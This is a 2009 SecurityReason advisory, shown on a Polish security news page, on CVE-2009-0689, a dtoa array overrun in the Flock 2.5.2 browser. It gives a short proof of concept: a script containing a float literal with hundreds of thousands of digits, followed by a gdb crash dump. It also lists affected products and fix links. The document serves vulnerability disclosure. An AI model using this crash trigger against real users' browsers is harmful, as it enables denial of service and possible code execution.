Bezpieczeństwo informacji

, Wiadomości IT, Audyt bezpieczeństwa
Rejestracja | Zapomniałem hasła | Zaloguj się
Polski Polski  Angielski Angielski
Szukaj :
SecurityReason
Wiadomości IT
Dodaj wiadomość
Szukaj
Baza SecurityAlert
O SecurityAlert
Baza ExploitAlert
Badania SecurityReason
WLB
Baza WLB
Dodaj Note WLB
O WLB
Audyt
Informacje
Harmonogram
Cena
Referencje
Kontakt
RSS
Wiadomości
SecurityAlert
ExploitAlert
Apache
PHP
WLB
Zespół
Kontakt
Informacje o firmie
Informacja

Jeśli znalazłeś interesujący błąd i chcesz go nam wysłać, użyj adresu:
secalert(.)securityreason(.)pl

Twój exploit może być opublikowany w dziale ExploitAlert. Wyślij go nam na adres:
exploit(.)securityreason(.)pl
Kategoria : SecurityReason Advisory

  Tytuł : Flock 2.5.2 Remote Array Overrun (Arbitrary code execution)
  SecurityAlert : 75
  CVE : CVE-2009-0689
  Poziom ryzyka : Wysoki  Poziom Wysoki  (Szczegóły)
  Zdalny błąd : Tak
  Lokalny błąd : Tak
  Występuje Exploit : Tak
  Autor : SecurityReason Research
  Data publikacji : 11.12.2009

  Podatne oprogramowanie : Flock 2.5.2



  Tekst :  

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- - Flock 2.5.2

Fixed in:
- - Flock 2.5.5

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/75


- --- 0.Description ---
Flock is a web browser built on Mozilla.s Firefox codebase that specializes
in providing social networking and Web 2.0 facilities built into its user
interface. Flock v2.5 was officially released on May 19, 2009.

The Flock browser is available as a free download, and supports Microsoft
Windows, Mac OS X, and Linux platforms.


- --- 1. Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ---
The main problem exist in dtoa implementation. Flock has the same dtoa as
Firefox, SeaMonkey, Chrome, Opera etc.
and it is the same like SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.


- --- 2. Proof of Concept (PoC) ---
- -----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
- -----------------------

Program received signal SIGSEGV, Segmentation fault.
0x67c68740 in js3250!JS_DHashTableEnumerate ()
from C:\Program Files\Flock\js3250.dll
(gdb) i r
eax 0x964619c7 -1773790777
ecx 0x2 2
edx 0x2 2
ebx 0x2 2
esp 0x20e7f0 0x20e7f0
ebp 0x1 0x1
esi 0x299d700 43636480
edi 0x299d701 43636481
eip 0x67c68740 0x67c68740
<js3250!JS_DHashTableEnumerate+288>
eflags 0x210202 [ IF RF ID ]
cs 0x1b 27
ss 0x23 35
ds 0x23 35
Es 0x23 35
fs 0x3b 59
gs 0x0 0

(gdb) x/i 0x67c68740
0x67c68740 <js3250!JS_DHashTableEnumerate+288>:
mov 0x67ce0458(,%edi,4),%eax
(gdb) x/x $eax
0x964619c7: Cannot access memory at address 0x964619c7


- --- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - Mozilla Thunderbird
- - Mozilla Sunbird
- - Mozilla Camino
- - KDE (example: konqueror)
- - Opera
- - K-Meleon
- - F-Lock

This list is not yet closed.


- --- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


- --- 5. Credits ---
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.


- --- 6. Greets ---
Infospec p_e_a pi3


- --- 7. Contact ---
Email:
- - cxib {a.t] securityreason [d0t} com
- - sp3x {a.t] securityreason [d0t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- - http://securityreason.com/key/sp3x.gpg

http://securityreason.com/
http://securityreason.pl/

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAksheuIACgkQpiCeOKaYa9a6kgCgkup7jH12XriVRt9ANPevyghu
9uwAoNwchC9esCuYpxHrWRPtkD77VYkg
=zyvz
-----END PGP SIGNATURE-----
Apache rss
» 
Apache HTTP Server Denial
   of Service Vulnerability
» 
Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)
» 
Apache Continuum
   cross-site scripting
   vulnerability
» 
Apache Tomcat DoS
   Vulnerability
PHP rss
» 
PHP Hashtables Denial of
   Service
» 
PHP 5.3.6 multiple null
   pointer dereference
» 
PHP 5.3.6 ZipArchive
   invalid use glob(3)
» 
libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)
Patronat

Szkolenia ISecMan

ISecMan

Szkolenia Multitrain

Multitrain
Copyright © SecurityReason. All Rights Reserved.